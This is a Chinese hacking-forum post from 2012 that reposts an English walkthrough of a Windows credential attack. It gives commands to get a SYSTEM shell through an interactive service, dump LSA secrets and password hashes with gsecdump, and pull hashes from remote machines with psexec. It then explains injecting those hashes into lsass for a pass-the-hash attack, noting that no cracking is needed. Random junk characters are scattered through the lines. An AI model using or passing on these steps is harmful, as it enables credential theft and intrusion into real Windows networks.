找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1963|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:
. d& W; R6 F, g% N' A$ A7 P2 r, w0 b: f$ x3 ?. U
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
: B* _1 n$ ]3 y+ A! z# g[SC] CreateService SUCCESS
5 s$ k' w+ c- c& K: G+ v. I& M# o
5 O4 K# i" l, `# r: ~- O- tC:\>sc start shellcmdline: ~* H* a) d+ L' M# }6 d8 X+ t* `
[SC] StartService FAILED 1053:" x3 l  w7 z8 J& s) {5 k4 P5 Y$ Y

) x$ O  e; P( A! e4 aThe service did not respond to the start or control request in a timely fashion." g7 E3 R$ }2 q! j

% y6 d0 ~0 }" L2 N) eC:\>sc delete shellcmdline
0 N* p3 Q* X1 @7 x- v- ~[SC] DeleteService SUCCESS
: \$ x, k+ h3 t# R$ W7 \4 F, X! }3 {1 K9 c
------------  }! M1 J8 r9 G. c; E( y
/ m0 |% z( c. L4 A/ e; U( K
Then in the new DOS window:' X3 f$ Q  [1 m( B
8 X2 a, L" n& n
Microsoft Windows XP [Version 5.1.2600]: e+ y" t5 z% [
(C) Copyright 1985-2001 Microsoft Corp.
4 R- h# L( `9 Y' L5 a2 p+ s+ |. [8 l4 W- C0 |
C:\WINDOWS\system32>whoami' h' S! p; Q' q; W+ C( Z, y% e
NT AUTHORITY\SYSTEM
( o# S) y7 ~8 z0 Z6 G/ ~! N
$ i" S$ W! P! @  Q: mC:\WINDOWS\system32>gsecdump -h1 I6 M3 D- ^/ f7 L8 p5 s& g
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se); ^2 L( `2 N' N
usage: gsecdump [options]/ w* u% c/ C6 O, v

2 K! M- m" L- x/ koptions:
% K# \" {0 L- o$ r  H-h [ --help ] show help
  I9 J& W; \% `9 R1 g-a [ --dump_all ] dump all secrets$ P. k3 ~- ~6 v. @* q4 k5 [5 V
-l [ --dump_lsa ] dump lsa secrets& w; s1 U5 M8 q; j
-w [ --dump_wireless ] dump microsoft wireless connections7 Q% P3 k: Z0 I! E3 A- o" E+ O) S
-u [ --dump_usedhashes ] dump hashes from active logon sessions- u5 k( e5 a  S( t
-s [ --dump_hashes ] dump hashes from SAM/AD4 g4 x8 D0 C8 d& Z

7 E* h' h/ I8 a2 j* A. {, c# `4 P4 i4 lAlthough I like to use:
) l6 j/ o9 t( p4 H7 g. W
/ T8 h$ P2 ^" ^& l) a3 V* v5 NPsExec v1.83 - Execute processes remotely
6 x) o3 l# R8 V+ L- ECopyright (C) 2001-2007 Mark Russinovich. K0 q$ @) f5 [! v: n# }: ]0 D7 R  V
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
) ^8 U9 Y6 V7 R
0 V" ~; s# S* h! x( _9 rC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT! _0 P' z9 k% {
3 L9 k' I% s1 ^
to get the hashes from active logon sessions of a remote system.3 p3 I( i1 u& f

! w  B: ~/ U$ Q" n  `: GThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
, P6 t% T- C+ C1 N- Q" ~' }6 R$ w+ `# q3 c
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
1 k1 f0 M/ R/ A8 S原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]0 M/ F' u, B  r. |4 T
' K1 V7 _) ~: D3 a6 Z
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。2 w4 j" ^! D' [& |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表